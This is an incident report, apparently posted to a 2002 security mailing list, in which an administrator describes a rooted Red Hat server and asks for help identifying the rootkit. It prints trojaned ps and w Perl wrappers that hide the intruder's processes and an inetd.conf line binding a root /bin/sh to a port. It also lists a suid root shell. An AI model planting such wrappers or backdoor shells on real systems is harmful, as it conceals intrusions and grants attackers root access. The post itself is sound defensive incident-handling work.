nouser - rootkit ?

From: Dan Uscatu (duscatu@phenomedia.ro)
Date: 02/11/02


From: "Dan Uscatu" <duscatu@phenomedia.ro>
To: <incidents@securityfocus.com>
Date: Mon, 11 Feb 2002 01:44:31 +0200


 hi
 i found today something funny happening when i tried to install a web
server
 on a customer's machine:
 1. w - returned some weird "/usr/bin/perl" processes
 2. ps - was not showing everything
 3. two connections to some irc servers; fuser - finding the process id's
for
 them, but ps not showing them

 some infos about the server (unfortunately it wasnt installed by me...):
 [root@www root]# uname -a
 Linux www 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown (compiled in
 the future too, lol)
 [root@www /root]# cat /etc/redhat-release
 Red Hat Linux release 7.1 (Seawolf)

 more digging... so i found some modified files:

 [root@www nouser]# ls -l /bin/ps
 -rwxr-xr-x 1 nouser nouser 188 Mar 2 15:45 /bin/ps

 [root@www /root]# cat /bin/ps
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
 grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
 print "$ps";
 [root@www /root]# ls -l /usr/lib/libxnotps
 -r-xr-xr-x 1 root root 64092 Apr 5 2001 /usr/lib/libxnotps

 [root@www nouser]# ls -l /usr/bin/w
 -rwxr-xr-x 1 nouser nouser 105 Jan 20 01:03 /usr/bin/w

 [root@www /root]# cat /usr/bin/w
 #!/usr/bin/perl
 $xargs =join(' ',@ARGV);
 $w = `/usr/lib/libxyotps $xargs \| grep -v nouser`;
 print "$w";
 [root@www /root]# ls -l /usr/lib/libxyotps
 -r-xr-xr-x 1 root root 8688 Apr 5 2001 /usr/lib/libxyotps

 there is another file called /usr/lib/libxzotps, but i couldnt find what is
 pointing at that, yet
 no reference found on the web, searching for "libxnotps" or "libxnotps" or
 "libxzotps"

 [root@www nouser]# grep nouser /etc/passwd
 nouser:x:502:502::/sbin/nouser:/bin/bash

 [root@www nouser]# ls -l /sbin/nouser
 total 3328
-rw-r--r-- 1 nouser nouser 80092 Mar 2 23:22 broadcast-5000.log
-rw-r--r-- 1 nouser nouser 3057793 Mar 2 23:22 broadcast-full.log
drwxr-xr-x 2 nouser nouser 4096 Mar 2 13:01 Desktop
drwxrwxr-x 4 nouser nouser 4096 Mar 5 19:23 iroffer
-rw-rw-r-- 1 nouser nouser 206865 Mar 5 19:23 iroffer.tar.gz
-rwsr-xr-x 1 root root 13855 Mar 2 13:04 nouser
-rw-rw-r-- 1 root root 2215 Mar 2 23:23 packet0r.pl
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:15 scan-1
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-2
drwxr-xr-x 3 nouser root 4096 Mar 2 13:04 scan-3
drwxrwxr-x 3 nouser nouser 4096 Jan 20 01:13 war

 of course the suid "nouser" gives a root shell... and the directories are
full of war scripts, flood tools, and warez... given away through irc bots

i have scanned the machine using chkroot kit... the only funny thing found
was an inetd.conf, containing:

 [root@www nouser]# cat /etc/inetd.conf
65456 stream tcp nowait root /bin/sh sh

 of course, inetd is not installed :) that points me to the idea that the
process was somehow automated... but i cant find any reference to a rootkit
that does these changes. seems pretty stupid for a rootkit anyway... but i
want to be sure no other major changes were made... before i install the
production server there.

thanks for any comments

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com